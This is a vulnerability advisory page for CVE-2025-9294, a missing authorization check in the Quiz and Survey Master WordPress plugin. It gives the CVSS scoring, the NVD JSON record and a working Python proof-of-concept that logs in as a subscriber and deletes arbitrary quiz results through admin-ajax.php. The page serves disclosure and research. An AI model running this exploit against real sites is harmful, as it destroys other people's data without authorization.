Security Vulnerability Report
δΈ­ζ–‡
CVE-2025-9294 CVSS 4.3 MEDIUM

CVE-2025-9294

Published: 2026-01-06 09:15:55
Last Modified: 2026-04-08 18:25:26

Description

The Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the qsm_dashboard_delete_result function in all versions up to, and including, 10.3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete quiz results.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:* - VULNERABLE
Quiz and Survey Master (QSM) plugin for WordPress <= 10.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-9294 PoC - WordPress QSM Plugin Unauthorized Quiz Result Deletion # Authenticated users with Subscriber role can delete any quiz results import requests import sys TARGET_URL = "https://target-wordpress-site.com" USERNAME = "attacker_account" PASSWORD = "attacker_password" RESULT_ID = 123 # Target quiz result ID to delete def exploit_cve_2025_9294(): """ Exploit for CVE-2025-9294: Missing capability check in qsm_dashboard_delete_result Allows authenticated attackers with Subscriber-level access to delete quiz results """ session = requests.Session() # Step 1: Authenticate to WordPress login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': f"{TARGET_URL}/wp-admin/" } response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful") # Step 2: Send malicious request to delete quiz result delete_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" # The vulnerable action 'qsm_dashboard_delete_result' lacks capability check exploit_data = { 'action': 'qsm_dashboard_delete_result', 'result_id': RESULT_ID } response = session.post(delete_url, data=exploit_data) if response.status_code == 200: print(f"[+] Request sent to delete result ID: {RESULT_ID}") print(f"[+] Response: {response.text}") return True else: print(f"[-] Request failed with status: {response.status_code}") return False if __name__ == "__main__": exploit_cve_2025_9294()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9294", "sourceIdentifier": "[email protected]", "published": "2026-01-06T09:15:55.077", "lastModified": "2026-04-08T18:25:26.363", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the qsm_dashboard_delete_result function in all versions up to, and including, 10.3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete quiz results."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "10.3.2", "matchCriteriaId": "7AECAB11-6DCA-4FCF-B614-133BB680CF29"}]}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/quiz-master-next/tags/10.2.6/php/admin/options-page-questions-tab.php#L1116", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://research.cleantalk.org/cve-2025-9294/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/55895508-d0ef-4855-8d15-b8a45ba0dcb2?source=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}